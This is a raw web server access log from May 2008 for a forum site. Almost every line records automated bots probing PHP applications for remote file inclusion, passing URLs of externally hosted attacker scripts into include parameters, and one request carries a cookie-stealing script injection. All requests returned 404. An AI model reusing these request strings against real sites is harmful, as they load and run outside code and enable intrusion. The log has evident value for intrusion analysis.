62.116.117.149 - - [11/May/2008:17:41:32 -0700] "GET /errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
62.116.117.149 - - [11/May/2008:17:41:32 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
62.116.117.149 - - [11/May/2008:17:41:32 -0700] "GET /logs/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.17.199.39 - - [11/May/2008:17:42:50 -0700] "GET //ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.17.199.39 - - [11/May/2008:17:42:50 -0700] "GET /errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:17:42:58 -0700] "GET /logs/access_071224.log//bbs/include/write.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:17:42:59 -0700] "GET //bbs/include/write.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:17:42:59 -0700] "GET /logs//bbs/include/write.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:17:42:59 -0700] "GET /logs/access_071224.log//bbs/include/write.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:17:42:59 -0700] "GET //bbs/include/write.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:17:43:00 -0700] "GET /logs//bbs/include/write.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.132.204.166 - - [11/May/2008:17:43:28 -0700] "GET /logs/access_071217.log//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
66.132.204.166 - - [11/May/2008:17:43:28 -0700] "GET /logs/access_071217.log/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
66.132.204.166 - - [11/May/2008:17:43:28 -0700] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
66.132.204.166 - - [11/May/2008:17:43:29 -0700] "GET /errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
66.132.204.166 - - [11/May/2008:17:43:29 -0700] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
66.132.204.166 - - [11/May/2008:17:43:29 -0700] "GET /logs/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:44:40 -0700] "GET /logs/access.log/index1.php?=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:44:40 -0700] "GET /index1.php?=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:44:41 -0700] "GET /logs/index1.php?=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:44:45 -0700] "GET /logs/access.log/index1.php?=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:44:45 -0700] "GET /index1.php?=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:44:45 -0700] "GET /logs/index1.php?=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
66.132.204.166 - - [11/May/2008:17:45:28 -0700] "GET /logs/access_071224.log//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
66.132.204.166 - - [11/May/2008:17:45:28 -0700] "GET /logs/access_071224.log/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:45:30 -0700] "GET /logs/access.log/index1.php?=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:45:30 -0700] "GET /index1.php?=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:45:30 -0700] "GET /logs/index1.php?=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:45:41 -0700] "GET /logs/access.log/index1.php?=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:45:42 -0700] "GET /index1.php?=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:45:42 -0700] "GET /logs/index1.php?=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
193.26.1.33 - - [11/May/2008:17:46:06 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:46:14 -0700] "GET /logs/access.log/index1.php?=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:46:14 -0700] "GET /index1.php?=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:46:14 -0700] "GET /logs/index1.php?=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
66.249.65.35 - - [11/May/2008:17:46:24 -0700] "GET /img/jonathan_fantini.jpg HTTP/1.1" 404 275 "-" "Googlebot-Image/1.0" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:46:48 -0700] "GET /logs/access.log/index1.php?=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:46:48 -0700] "GET /index1.php?=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:46:48 -0700] "GET /logs/index1.php?=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
211.172.232.90 - - [11/May/2008:17:47:40 -0700] "GET /logs/access_080303.log//db.php?path_local=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
211.172.232.90 - - [11/May/2008:17:47:41 -0700] "GET //db.php?path_local=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
211.172.232.90 - - [11/May/2008:17:47:41 -0700] "GET /logs//db.php?path_local=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
216.188.60.54 - - [11/May/2008:17:47:51 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
216.188.60.54 - - [11/May/2008:17:47:51 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.90.72.88 - - [11/May/2008:17:48:11 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
74.53.137.18 - - [11/May/2008:17:48:20 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
74.53.137.18 - - [11/May/2008:17:48:20 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
121.254.129.70 - - [11/May/2008:17:49:15 -0700] "GET /logs/access.log/home.php?pagina=http://www.darklegions.net/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
121.254.129.70 - - [11/May/2008:17:49:16 -0700] "GET /home.php?pagina=http://www.darklegions.net/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
121.254.129.70 - - [11/May/2008:17:49:16 -0700] "GET /logs/home.php?pagina=http://www.darklegions.net/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.172.232.90 - - [11/May/2008:17:49:20 -0700] "GET /logs/access_080211.log//db.php?path_local=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
74.53.240.146 - - [11/May/2008:17:49:29 -0700] "GET /logs/access_080204.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [11/May/2008:17:49:30 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [11/May/2008:17:49:30 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:17:49:38 -0700] "GET /logs/access_080204.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:17:49:38 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:17:49:38 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:17:49:39 -0700] "GET /logs/access_080204.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:17:49:39 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:17:49:39 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
201.130.79.61 - - [11/May/2008:17:49:55 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://nodaorlz.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.collegiateforum.org"
201.130.79.61 - - [11/May/2008:17:49:55 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://nodaorlz.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.collegiateforum.org"
121.254.129.70 - - [11/May/2008:17:50:03 -0700] "GET /logs/access_080324.log/home.php?pagina=http://www.darklegions.net/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.137.18 - - [11/May/2008:17:50:14 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
83.19.144.26 - - [11/May/2008:17:50:49 -0700] "GET /logs/access_071224.log//bbs/include/write.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
83.19.144.26 - - [11/May/2008:17:50:51 -0700] "GET //bbs/include/write.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
83.19.144.26 - - [11/May/2008:17:50:53 -0700] "GET /logs//bbs/include/write.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
200.195.11.193 - - [11/May/2008:17:51:15 -0700] "GET /logs/access_080204.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
200.195.11.193 - - [11/May/2008:17:51:15 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
200.195.11.193 - - [11/May/2008:17:51:15 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
160.99.12.231 - - [11/May/2008:17:51:37 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
160.99.12.231 - - [11/May/2008:17:51:38 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
160.99.12.231 - - [11/May/2008:17:51:38 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
160.99.12.231 - - [11/May/2008:17:51:40 -0700] "GET /logs/access_080107.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
160.99.12.231 - - [11/May/2008:17:52:16 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
160.99.12.231 - - [11/May/2008:17:52:16 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:17:52:17 -0700] "GET /logs/access_071231.log//classes.php?LOCAL_PATH=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:17:52:18 -0700] "GET //classes.php?LOCAL_PATH=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:17:52:18 -0700] "GET /logs/access_071231.log//classes.php?LOCAL_PATH=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:17:52:18 -0700] "GET /logs//classes.php?LOCAL_PATH=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:17:52:18 -0700] "GET //classes.php?LOCAL_PATH=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:17:52:18 -0700] "GET /logs//classes.php?LOCAL_PATH=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
74.53.240.146 - - [11/May/2008:17:52:23 -0700] "GET /logs/access_071231.log//classes.php?LOCAL_PATH=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [11/May/2008:17:52:23 -0700] "GET //classes.php?LOCAL_PATH=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [11/May/2008:17:52:23 -0700] "GET /logs//classes.php?LOCAL_PATH=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.195.11.193 - - [11/May/2008:17:52:37 -0700] "GET /logs/access_071231.log//classes.php?LOCAL_PATH=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
200.195.11.193 - - [11/May/2008:17:52:37 -0700] "GET //classes.php?LOCAL_PATH=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
200.195.11.193 - - [11/May/2008:17:52:38 -0700] "GET /logs//classes.php?LOCAL_PATH=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
85.17.138.13 - - [11/May/2008:17:53:28 -0700] "GET //config/dbutil.bck.php?confdir=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.collegiateforum.org"
85.17.138.13 - - [11/May/2008:17:53:30 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.collegiateforum.org"
62.75.184.206 - - [11/May/2008:17:54:17 -0700] "GET /logs/access_080107.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
62.75.184.206 - - [11/May/2008:17:54:18 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
62.75.184.206 - - [11/May/2008:17:54:18 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
83.19.144.26 - - [11/May/2008:17:54:54 -0700] "GET /logs/access_071231.log//classes.php?LOCAL_PATH=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
83.19.144.26 - - [11/May/2008:17:54:57 -0700] "GET //classes.php?LOCAL_PATH=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
83.19.144.26 - - [11/May/2008:17:54:59 -0700] "GET /logs//classes.php?LOCAL_PATH=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
72.34.226.62 - - [11/May/2008:17:55:29 -0700] "GET //config/dbutil.bck.php?confdir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
213.246.51.45 - - [11/May/2008:17:55:42 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.246.51.45 - - [11/May/2008:17:55:43 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
59.22.140.17 - - [11/May/2008:17:55:54 -0700] "GET /logs/access_080204.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
59.22.140.17 - - [11/May/2008:17:56:00 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
145.100.60.18 - - [11/May/2008:17:56:02 -0700] "GET /logs/access_080107.log//config/dbutil.bck.php?confdir=http://elveon.tripod.com/news/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
145.100.60.18 - - [11/May/2008:17:56:03 -0700] "GET //config/dbutil.bck.php?confdir=http://elveon.tripod.com/news/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
145.100.60.18 - - [11/May/2008:17:56:03 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://elveon.tripod.com/news/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
74.53.240.146 - - [11/May/2008:17:56:12 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [11/May/2008:17:56:12 -0700] "GET //skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [11/May/2008:17:56:12 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
62.75.184.206 - - [11/May/2008:17:56:16 -0700] "GET /logs/access_071217.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:17:56:19 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:17:56:19 -0700] "GET //skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.232.68.17 - - [11/May/2008:17:56:20 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
160.99.12.231 - - [11/May/2008:17:56:39 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.collegiateforum.org"
160.99.12.231 - - [11/May/2008:17:56:40 -0700] "GET //config/dbutil.bck.php?confdir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.collegiateforum.org"
83.19.144.26 - - [11/May/2008:17:56:50 -0700] "GET /logs/access_080204.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
83.19.144.26 - - [11/May/2008:17:56:52 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
83.19.144.26 - - [11/May/2008:17:56:54 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
84.19.176.158 - - [11/May/2008:17:56:55 -0700] "GET //config/dbutil.bck.php?confdir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
